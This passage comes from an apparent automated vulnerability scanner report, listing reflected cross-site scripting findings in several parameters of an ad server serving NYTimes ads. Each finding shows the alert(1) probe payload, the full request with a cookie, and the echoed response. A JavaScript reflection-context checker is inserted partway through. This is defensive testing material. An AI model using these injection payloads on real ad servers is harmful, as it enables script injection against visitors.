/250%3B38884434/38902191/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt147582_246220%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle393c6'-alert(1)-'1d2aff2c6c1&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto=http://www.respire.hyatt.com?src=agn_hhc_ba_nyt
...[SNIP]...

4.14. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B4933145 [sn1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B4933145

Issue detail

The value of the sn1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66d30'-alert(1)-'7905f129f26 was submitted in the sn1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B4933145;sz=300x250;pc=nyt147582_246220;ord=2010.11.15.07.15.33;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a66d30'-alert(1)-'7905f129f26&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:19:58 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6563

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
e=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a66d30'-alert(1)-'7905f129f26&goto=http://www.respire.hyatt.com?src=agn_hhc_ba_nyt\">
...[SNIP]...

4.15. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B4933145 [sn1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B4933145

Issue detail

The value of the sn1 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 42ca9"-alert(1)-"a08685d2013 was submitted in the sn1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B4933145;sz=300x250;pc=nyt147582_246220;ord=2010.11.15.07.15.33;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a42ca9"-alert(1)-"a08685d2013&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:19:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6563

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
e=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a42ca9"-alert(1)-"a08685d2013&goto=http://www.respire.hyatt.com?src=agn_hhc_ba_nyt");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow
...[SNIP]...
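A check for the claim each finding makes ("copied into a JavaScript string which is encapsulated in ... quotation marks" and "echoed unmodified"), as an added example that is not part of the report or of the scanner. Given a response body and the submitted payload, it locates every verbatim echo and tracks JavaScript string and comment state up to that offset, so you can confirm both which delimiter encloses the echo and whether the payload actually carries the character needed to close it. The sample body is constructed, a shortened version of the responses quoted above with one single-quoted document.write() string and one double-quoted string; the payloads are the report's.

```javascript
// Added example; not part of the report or the scanner. Locates each verbatim echo of the
// payload in a response body and determines the JavaScript lexical context at that point.
const PAYLOAD_DQ = '2d553"-alert(1)-"341ef100f1a';
const PAYLOAD_SQ = "73647'-alert(1)-'11293dd737";

// Constructed response body: the click parameter appears once inside a single-quoted
// document.write() string (with \" around the attribute) and once inside a double-quoted
// string, as in the ad responses above.
function sampleBody(payload) {
  const click = 'http://www.nytimes.com/adx/bin/adx_click.html?type=goto&goto=&' + payload + '=1';
  return "document.write('<!-- Code auto-generated -->\\r\\n<a href=\\\"" + click + "\\\">Ad</a>');\n" +
         'var url = ("' + click + 'http://www.respire.hyatt.com?src=agn_hhc_ba_nyt");\n' +
         'var fscUrl = url;';
}

// Scan `src` up to `offset`, returning the lexical state there: 'code', the quote character
// of the enclosing string literal, or a comment kind. Backslash escapes inside strings are
// honoured; regular-expression literals are not modelled (the ad code above has none).
function jsContextAt(src, offset) {
  let state = 'code';
  for (let i = 0; i < offset; i++) {
    const ch = src[i], next = src[i + 1];
    if (state === 'code') {
      if (ch === "'" || ch === '"' || ch === '`') state = ch;
      else if (ch === '/' && next === '/') { state = 'line-comment'; i++; }
      else if (ch === '/' && next === '*') { state = 'block-comment'; i++; }
    } else if (state === 'line-comment') {
      if (ch === '\n') state = 'code';
    } else if (state === 'block-comment') {
      if (ch === '*' && next === '/') { state = 'code'; i++; }
    } else {                       // inside a ' " or ` literal
      if (ch === '\\') i++;        // skip the escaped character
      else if (ch === state) state = 'code';
    }
  }
  return state;
}

// Every verbatim occurrence of `payload` in `body`, with the context it lands in and whether
// the payload carries the delimiter needed to close that context.
function checkReflection(body, payload) {
  const hits = [];
  for (let from = 0; ; ) {
    const at = body.indexOf(payload, from);
    if (at === -1) return hits;
    const context = jsContextAt(body, at);
    const isString = context === "'" || context === '"' || context === '`';
    hits.push({ offset: at, context, breaksOut: isString && payload.includes(context) });
    from = at + payload.length;
  }
}

console.log(checkReflection(sampleBody(PAYLOAD_DQ), PAYLOAD_DQ));
console.log(checkReflection(sampleBody(PAYLOAD_SQ), PAYLOAD_SQ));
```

Running it shows why the scanner reports two findings per parameter: each payload lands in both strings but can only close the one whose delimiter it carries. The tracker deliberately does not model regular-expression literals or automatic semicolon insertion; for responses that contain them, run the body through a real JavaScript parser instead.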

4.16. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B4933145 [sn2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B4933145

Issue detail

The value of the sn2 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 340e4'-alert(1)-'7afe9285df0 was submitted in the sn2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B4933145;sz=300x250;pc=nyt147582_246220;ord=2010.11.15.07.15.33;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3340e4'-alert(1)-'7afe9285df0&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:19:31 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6563

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3340e4'-alert(1)-'7afe9285df0&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto=http://www.respire.hyatt.com?src=agn_hhc_ba_nyt\">
...[SNIP]...

4.17. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B4933145 [sn2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B4933145

Issue detail

The value of the sn2 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f591d"-alert(1)-"9e1f07ef07d was submitted in the sn2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B4933145;sz=300x250;pc=nyt147582_246220;ord=2010.11.15.07.15.33;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3f591d"-alert(1)-"9e1f07ef07d&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:19:27 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6563

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3f591d"-alert(1)-"9e1f07ef07d&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto=http://www.respire.hyatt.com?src=agn_hhc_ba_nyt");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";

...[SNIP]...

4.18. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B4933145 [snr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B4933145

Issue detail

The value of the snr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6b1aa'-alert(1)-'9131abe2505 was submitted in the snr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B4933145;sz=300x250;pc=nyt147582_246220;ord=2010.11.15.07.15.33;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick6b1aa'-alert(1)-'9131abe2505&snx=1289802072&sn1=f35fce60/c8fa649a&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:19:40 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6563

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick6b1aa'-alert(1)-'9131abe2505&snx=1289802072&sn1=f35fce60/c8fa649a&goto=http://www.respire.hyatt.com?src=agn_hhc_ba_nyt\">
...[SNIP]...

4.19. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B4933145 [snr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B4933145

Issue detail

The value of the snr request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90c03"-alert(1)-"db085e619ba was submitted in the snr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B4933145;sz=300x250;pc=nyt147582_246220;ord=2010.11.15.07.15.33;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick90c03"-alert(1)-"db085e619ba&snx=1289802072&sn1=f35fce60/c8fa649a&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:19:36 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6563

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick90c03"-alert(1)-"db085e619ba&snx=1289802072&sn1=f35fce60/c8fa649a&goto=http://www.respire.hyatt.com?src=agn_hhc_ba_nyt");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscrip
...[SNIP]...

4.20. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B4933145 [snx parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B4933145

Issue detail

The value of the snx request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 91c16'-alert(1)-'1145846c2df was submitted in the snx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B4933145;sz=300x250;pc=nyt147582_246220;ord=2010.11.15.07.15.33;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=128980207291c16'-alert(1)-'1145846c2df&sn1=f35fce60/c8fa649a&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:19:49 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6563

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
tml?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=128980207291c16'-alert(1)-'1145846c2df&sn1=f35fce60/c8fa649a&goto=http://www.respire.hyatt.com?src=agn_hhc_ba_nyt\">
...[SNIP]...

4.21. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B4933145 [snx parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B4933145

Issue detail

The value of the snx request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2bd3"-alert(1)-"fe005cef2e0 was submitted in the snx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B4933145;sz=300x250;pc=nyt147582_246220;ord=2010.11.15.07.15.33;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072e2bd3"-alert(1)-"fe005cef2e0&sn1=f35fce60/c8fa649a&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:19:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6563

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
tml?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072e2bd3"-alert(1)-"fe005cef2e0&sn1=f35fce60/c8fa649a&goto=http://www.respire.hyatt.com?src=agn_hhc_ba_nyt");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "neve
...[SNIP]...

4.22. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B4933145 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B4933145

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b60df'-alert(1)-'060f0b2a3b7 was submitted in the sz parameter. This input was echoed unmodified in the application's response. The parameter label is an artefact of how the scanner parsed the semicolon-delimited path: in the request below the payload is appended to the type=goto value of the nested click-through URL, while sz=300x250 itself is unchanged, so the actual injection point is the click URL that the server copies into the script.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B4933145;sz=300x250;pc=nyt147582_246220;ord=2010.11.15.07.15.33;click=http://www.nytimes.com/adx/bin/adx_click.html?type=gotob60df'-alert(1)-'060f0b2a3b7&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:17:56 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6563

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
8/3a53/7/12b/%2a/f%3B231182659%3B0-0%3B0%3B55362154%3B4307-300/250%3B38884434/38902191/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt147582_246220%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=gotob60df'-alert(1)-'060f0b2a3b7&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60
...[SNIP]...

4.23. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B4933145 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B4933145

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48242"-alert(1)-"d0ace12d614 was submitted in the sz parameter. This input was echoed unmodified in the application's response. As in 4.22, the sz label is a scanner parsing artefact: the payload is appended to the type=goto value of the nested click-through URL in the request below, and sz=300x250 is unchanged.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B4933145;sz=300x250;pc=nyt147582_246220;ord=2010.11.15.07.15.33;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto48242"-alert(1)-"d0ace12d614&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:17:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6563

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
